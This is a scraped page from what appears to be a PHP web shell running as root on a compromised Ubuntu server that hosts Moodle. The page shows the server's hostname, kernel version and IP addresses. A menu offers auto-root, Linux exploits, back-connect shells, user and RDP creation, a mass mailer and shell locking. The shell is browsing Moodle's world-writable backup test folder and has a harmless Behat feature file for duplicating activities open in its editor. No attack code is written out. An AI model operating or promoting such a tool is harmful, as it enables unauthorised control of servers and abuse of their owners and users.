Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
backup /
util /
ui /
tests /
behat /
[ HOME SHELL ]
Name
Size
Permission
Action
backup_courses.feature
2.67
KB
-rwxrwxrwx
behat_backup.php
17.75
KB
-rwxrwxrwx
duplicate_activities.feature
1.77
KB
-rwxrwxrwx
import_contentbank_content.fea...
1.85
KB
-rwxrwxrwx
import_course.feature
1.59
KB
-rwxrwxrwx
import_groups.feature
2.02
KB
-rwxrwxrwx
restore_moodle2_courses.featur...
10.97
KB
-rwxrwxrwx
restore_moodle2_courses_settin...
5.44
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : duplicate_activities.feature
@core @core_backup Feature: Duplicate activities In order to set up my course contents quickly As a teacher I need to duplicate activities inside the same course Scenario: Duplicate an activity Given the following "courses" exist: | fullname | shortname | category | | Course 1 | C1 | 0 | And the following "users" exist: | username | firstname | lastname | email | | teacher1 | Teacher | 1 | teacher1@example.com | And the following "course enrolments" exist: | user | course | role | | teacher1 | C1 | editingteacher | And the following config values are set as admin: | backup_import_activities | 0 | backup | And I log in as "teacher1" And I am on "Course 1" course homepage with editing mode on And I add a "Database" to section "1" and I fill the form with: | Name | Test database name | | Description | Test database description | And I duplicate "Test database name" activity And I should see "Test database name (copy)" And I wait until section "1" is available And I click on "Edit settings" "link" in the "Test database name" activity And I set the following fields to these values: | Name | Original database name | And I press "Save and return to course" And I click on "Edit settings" "link" in the "Test database name (copy)" activity And I set the following fields to these values: | Name | Duplicated database name | | Description | Duplicated database description | And I press "Save and return to course" Then I should see "Original database name" in the "Topic 1" "section" And I should see "Duplicated database name" in the "Topic 1" "section" And "Original database name" "link" should appear before "Duplicated database name" "link"
Close